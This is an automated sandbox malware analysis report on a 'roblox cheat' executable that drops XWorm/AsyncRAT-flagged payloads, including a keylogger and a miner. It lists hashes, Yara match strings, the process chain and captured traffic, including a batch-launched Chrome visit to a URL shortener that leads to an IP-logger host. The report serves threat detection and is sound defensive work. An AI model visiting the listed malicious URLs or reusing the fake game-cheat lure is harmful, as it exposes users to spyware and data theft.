
Windows Analysis Report
roblox cheat.exe

Overview

General Information

Sample name: roblox cheat.exe
Analysis ID: 1484380
MD5: 6b94734feac8edb9f925385163ad59c9
SHA1: 3ec9cc36f11ce7836e86089631ad790e7c8fe3cc
SHA256: 62d6f204244bbb976a155aa7750874a56db925c8531d76dce6bf5560440cb63c
Tags: exe

Detection

XWorm
Score: 90
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • roblox cheat.exe (PID: 1952 cmdline: "C:\Users\user\Desktop\roblox cheat.exe" MD5: 6B94734FEAC8EDB9F925385163AD59C9)
    • robloxPX1instaler.exe (PID: 4948 cmdline: "C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe" MD5: 27469372591B14FF1C57654FACB5E020)
    • cheatinstaler cheatinstalerF6R54T.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" MD5: FC411F4D9F4DBA5104CB1549153A8684)
      • cmd.exe (PID: 7200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7324 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chrome.exe (PID: 7444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 7716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1928,i,13588240422126798521,8416605528282741341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7aa6:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\ msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\ msedge.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7aa6:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\Keyloger.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8be8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8c85:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8d9a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8896:$cnc4: POST / HTTP/1.1
Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 7156 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
No Sigma rule has matched
No Snort rule has matched

Timestamp: 2024-07-30T00:54:42.469428+0200
SID: 2022930
Source Port: 443
Destination Port: 49712
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-30T00:55:19.729239+0200
SID: 2022930
Source Port: 443
Destination Port: 60764
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection
Source: roblox cheat.exe | Avira: detected
Source: https://2no.co/24RXx6H | Avira URL Cloud: Label: malware
Source: https://2no.co/ | Avira URL Cloud: Label: malware
Source: https://2no.co/redirect-2 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | ReversingLabs: Detection: 60%
Source: roblox cheat.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | Joe Sandbox ML: detected
Source: roblox cheat.exe | Joe Sandbox ML: detected
Source: roblox cheat.exe, 00000000.00000000.1339003894.0000000000912000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_dcd03e6b-2
Source: roblox cheat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.9:60764 version: TLS 1.2
Source: roblox cheat.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb | source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb | source: roblox cheat.exe
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb | source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM | source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM | source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM | source: robloxPX1instaler.exe, 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1344820205.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF75456B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF75456B190
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF7545540BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7545540BC
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF75457FCA0 FindFirstFileExA,3_2_00007FF75457FCA0
Source: global traffic | TCP traffic: 192.168.2.9:60760 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 88.212.201.198
Source: Joe Sandbox View | IP Address: 104.21.79.229
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: global traffic | HTTP traffic detected:
  GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USNpFfLxfLR8zud&MD=tboVBsUh HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected:
  GET /24RXx6 HTTP/1.1
  Host: 2no.co
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /redirect/handshake.png HTTP/1.1
  Host: cdn.iplogger.org
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://2no.co/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
  Host: counter.yadro.ru
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://2no.co/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
  Host: counter.yadro.ru
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://2no.co/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: FTID=1cg1sr1pFper1cg1sr001FMX
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: cdn.iplogger.org
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://2no.co/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
  Host: counter.yadro.ru
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: FTID=1cg1sr1pFper1cg1sr001FMX; VID=2DNPIG0nbdur1cg1ss001FSz
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: cdn.iplogger.org
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /fs/windows/config.json HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
  Range: bytes=0-2147483646
  User-Agent: Microsoft BITS/7.8
  Host: fs.microsoft.com
Source: global traffic | HTTP traffic detected:
  GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USNpFfLxfLR8zud&MD=tboVBsUh HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic | DNS traffic detected: DNS query: ecsv2.roblox.com
Source: global traffic | DNS traffic detected: DNS query: clientsettingscdn.roblox.com
Source: global traffic | DNS traffic detected: DNS query: 2no.co
Source: global traffic | DNS traffic detected: DNS query: cdn.iplogger.org
Source: global traffic | DNS traffic detected: DNS query: counter.yadro.ru
Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: unknown | HTTP traffic detected:
  POST /report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9B HTTP/1.1
  Host: a.nel.cloudflare.com
  Connection: keep-alive
  Content-Length: 422
  Content-Type: application/reports+json
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Mon, 29 Jul 2024 22:54:44 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
  Cross-Origin-Embedder-Policy: require-corp
  Cross-Origin-Opener-Policy: same-origin
  Cross-Origin-Resource-Policy: same-origin
  Origin-Agent-Cluster: ?1
  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Referrer-Policy: same-origin
  X-Content-Options: nosniff
  X-Frame-Options: SAMEORIGIN
  cf-mitigated: challenge
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/_1J
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.11rbr
            Source: chromecache_137.12.drString found in binary or memory: https://2no.co/
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, coin.bat.3.drString found in binary or memory: https://2no.co/24RXx6
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/24RXx6H
            Source: chromecache_137.12.drString found in binary or memory: https://2no.co/redirect-2
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/redirect/brand.png
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/redirect/handshake.png
            Source: chromecache_137.12.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://client-telemetry.roblox.com
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com3
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.cominatorey
            Source: robloxPX1instaler_48CB5.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerblox
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerocal
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerons
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerp
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64p
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings
            Source: robloxPX1instaler_48CB5.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: robloxPX1instaler_48CB5.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper3
            Source: robloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperLMEMX
